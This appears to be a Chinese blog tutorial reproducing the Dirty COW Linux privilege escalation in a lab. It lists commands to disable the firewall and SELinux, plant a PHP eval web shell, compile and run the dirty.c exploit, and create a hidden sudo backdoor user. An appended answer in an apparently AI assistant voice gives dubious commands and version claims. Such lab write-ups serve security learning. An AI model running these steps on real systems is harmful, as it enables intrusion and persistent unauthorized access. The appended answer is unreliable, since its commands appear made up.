Linux脏牛漏洞提权复现

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

操作系统: Linux ( CentOS 6.5)

Web服务: PHP+Apache

环境搭建

第一步,配置yum源,安装PHP

进入yum目录

cd /etc/yum.repos.d/

 创建文件夹a

mkdir a

 将此目录下的所有文件移动至文件夹a中

mv C* a

 创建yum源文件

vim my.repo     -- 创建yum源文件,内容如下:

[sss]
name=my
baseurl=file:/media/CentOS_6.5_Final
gpgcheck=0

安装PHP( 安装的PHP自带Apache )

yum install php -y

 

 

安装gcc编译工具( 方便后续操作的使用 )

yum install gcc

 

启动Apache服务

service httpd start

 关闭防火墙

service iptables stop

 关闭内核防火墙 

setenforce 0

 访问Web网站( 里面啥也没有,主要是为了测试漏洞 )

第二步,上传木马,使用中国菜刀连接

网站根目录上传木马文件( 这里直接写一个木马文件 ),内容为一句话木马,网站的默认根目录是/var/www/html目录

cd /var/www/html/

 

vim shell.php

 

<?php eval($_POST[-7]); ?>

 使用中国菜刀连接

漏洞复现

第三步,查看内核版本,上传对应的脏牛工具

使用中国菜刀打开虚拟终端,使用id命令查看当前用户

 uname -a 查看Linux内核版本信息

 使用中国菜刀打开文件管理,上传脏牛工具到/tmp目录下,Linux只有tmp目录默认有上传和执行权限

第四步,使用脏牛工具进行提权

进入/tmp目录,编译脏牛工具( 上传的工具属于源码脚本,编译后才能执行)

gcc -pthread dirty.c -o dirty -lcrypt

 

 执行脏牛工具,执行文件即可,后面的数字是密码,可随便定义,

 ./dirty 123456

 提示执行超时以及命令执行失败,不用管,查看用户信息,脚本已经生效,firefart用户具有原本root用户的权限,密码为我们上一步设置的123456

cat /etc/passwd

 使用firefart用户进行远程连接( 此处使用Xshell工具进行连接 )

ssh firefart@192.168.145.130

第五步,利用提升的权限创建后门用户

还原/etc/passwd,使用脏牛工具备份的passwd.bak文件替换/etc/passwd文件

mv /tmp/passwd.bak /etc/passwd

wheel组为普通管理员组,默认不开启,利用这个wheel组来创建后门用户

修改/etc/sudoers配置文件,默认只读,需要添加修改权限

chmod u+w /etc/sudoers

 去除/etc/sudoers配置文件中105行的注释,使wheel组生效

vim /etc/sudoers

创建普通用户tom,并添加至wheel组,使其拥有管理员权限

useradd tom
passwd tom
gpasswd -a tom wheel

 低级用户切换高级用户需要高级用户的密码,而我们创建的后门用户不需要密码即可切换root用户

sudo su root

  • 7
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
你好!对于Linux提权脏牛漏洞(CVE-2016-5195),我可以为你提供一些复现的步骤。请注意,这是一个严重的安全漏洞,仅用于测试和教育目的。 在开始之前,请确保你已经备份了你的系统和数据,因为这个过程可能会对系统造成损坏。 以下是复现脏牛漏洞的一般步骤: 1. 确认你的系统受到脏牛漏洞的影响。你可以使用以下命令检查: ```shell $ uname -r ``` 如果输出的内核版本在`3.0`到`4.7`之间(不包括两端),那么你的系统可能受到影响。 2. 下载并编译脏牛漏洞的测试程序,可以使用以下命令: ```shell $ git clone https://github.com/dirtycow/dirtycow.github.io $ cd dirtycow.github.io $ make ``` 3. 运行测试程序进行提权。请注意,这可能会对系统造成损坏,所以请谨慎操作。 ```shell $ ./test_dirtycow your_file_name ``` `your_file_name`是你想要修改的目标文件的路径。这个测试程序会尝试修改目标文件的权限,以实现提权效果。 4. 检查提权是否成功。你可以尝试运行一个需要超级用户权限的命令来验证。 ```shell $ sudo whoami ``` 如果输出结果为"root",那么你已经成功提权了。 请记住,在测试和复现漏洞时,务必遵守法律和道德准则。此外,确保你在合法的环境下进行测试,并获得了合适的授权。 希望这些步骤能帮助到你!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值